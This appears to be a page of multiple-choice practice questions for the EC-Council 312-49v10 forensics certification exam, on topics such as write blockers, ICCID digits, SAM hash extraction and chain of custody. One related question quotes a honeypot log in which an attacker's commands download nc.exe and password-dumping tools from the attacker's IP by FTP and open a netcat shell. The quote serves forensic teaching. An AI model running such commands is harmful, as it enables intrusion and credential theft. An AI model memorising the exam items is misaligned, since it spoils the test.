Home / ECCouncil / 312-49v10

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 62

Question list

List of questions

Question 611

(0)

An investigator needs to perform data acquisition from a storage media without altering its contents to maintain the Integrity of the content. The approach adopted by the Investigator relies upon th

Question 612

(0)

During an Investigation. Noel found a SIM card from the suspect's mobile. The ICCID on the card is 8944245252001451548. What does the first four digits (89 and 44) In the ICCID represent?

Question 613

(0)

Which following forensic tool allows investigator to detect and extract hidden streams on NTFS drive?

Question 614

(0)

Cybercriminals sometimes use compromised computers to commit other crimes, which may involve using computers or networks to spread malware or Illegal Information. Which type of cybercrime stops user

Question 615

(0)

When installed on a Windows machine, which port does the Tor browser use to establish a network connection via Tor nodes?

Question 616

(0)

An investigator wants to extract passwords from SAM and System Files. Which tool can the Investigator use to obtain a list of users, passwords, and their hashes In this case?

Question 617

(0)

William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?

Question 618

(0)

What happens lo the header of the file once It Is deleted from the Windows OS file systems?

Question 619

(0)

Sally accessed the computer system that holds trade secrets of the company where she Is employed. She knows she accessed It without authorization and all access (authorized and unauthorized) to thi

Question 620

(0)

Fred, a cybercrime Investigator for the FBI, finished storing a solid-state drive In a static resistant bag and filled out the chain of custody form. Two days later. John grabbed the solid-state dri

Related questions

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?

William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?

In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?

In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?

An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?

You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?

Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads It to VirusTotal in order to confirm whether the file Is malicious, provide information about Its functionality, and provide Information that will allow to produce simple network signatures. What type of malware analysis was performed here?

Question 611

An investigator needs to perform data acquisition from a storage media without altering its contents to maintain the Integrity of the content. The approach adopted by the Investigator relies upon the capacity of enabling read-only access to the storage medi a. Which tool should the Investigator Integrate Into his/her procedures to accomplish this task?

BitLocker

Data duplication tool

Backup tool

Write blocker

Show Answer Comment (0)

Question 612

During an Investigation. Noel found a SIM card from the suspect's mobile. The ICCID on the card is 8944245252001451548.

What does the first four digits (89 and 44) In the ICCID represent?

TAC and industry identifier

Country code and industry identifier

Industry identifier and country code

Issuer identifier number and TAC

Show Answer Comment (0)

Question 613

Which following forensic tool allows investigator to detect and extract hidden streams on NTFS drive?

Stream Detector

TimeStomp

Autopsy

analyzeMFT

Show Answer Comment (0)

Question 614

Cybercriminals sometimes use compromised computers to commit other crimes, which may involve using computers or networks to spread malware or Illegal Information. Which type of cybercrime stops users from using a device or network, or prevents a company from providing a software service to its customers?

Denial-of-Service (DoS) attack

Malware attack

Ransomware attack

Phishing

Show Answer Comment (0)

Question 615

When installed on a Windows machine, which port does the Tor browser use to establish a network connection via Tor nodes?

7680

49667/49668

9150/9151

49664/49665

Show Answer Comment (0)

Question 616

An investigator wants to extract passwords from SAM and System Files. Which tool can the Investigator use to obtain a list of users, passwords, and their hashes In this case?

PWdump7

HashKey

Nuix

FileMerlin

Show Answer Comment (0)

Question 617

William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?

The combined log format of Apache access log

The common log format of Apache access log

Apache error log

IIS log

Show Answer Comment (0)

Question 618

What happens lo the header of the file once It Is deleted from the Windows OS file systems?

The OS replaces the first letter of a deleted file name with a hex byte code: E5h

The OS replaces the entire hex byte coding of the file.

The hex byte coding of the file remains the same, but the file location differs

The OS replaces the second letter of a deleted file name with a hex byte code: Eh5

Show Answer Comment (0)

Question 619

Sally accessed the computer system that holds trade secrets of the company where she Is employed.

She knows she accessed It without authorization and all access (authorized and unauthorized) to this computer Is monitored.To cover her tracks. Sally deleted the log entries on this computer. What among the following best describes her action?

Password sniffing

Anti-forensics

Brute-force attack

Network intrusion

Show Answer Comment (0)

Question 620

Fred, a cybercrime Investigator for the FBI, finished storing a solid-state drive In a static resistant bag and filled out the chain of custody form. Two days later. John grabbed the solid-state drive and created a clone of It (with write blockers enabled) In order to Investigate the drive. He did not document the chain of custody though. When John was finished, he put the solid-state drive back in the static resistant and placed it back in the evidence locker. A day later, the court trial began and upon presenting the evidence and the supporting documents, the chief Justice outright rejected them. Which of the following statements strongly support the reason for rejecting the evidence?

Block clones cannot be created with solid-state drives

Write blockers were used while cloning the evidence

John did not document the chain of custody

John investigated the clone instead of the original evidence itself

Show Answer Comment (0)

Total 704 questions

60 61 62 63 64

Go to page: of 71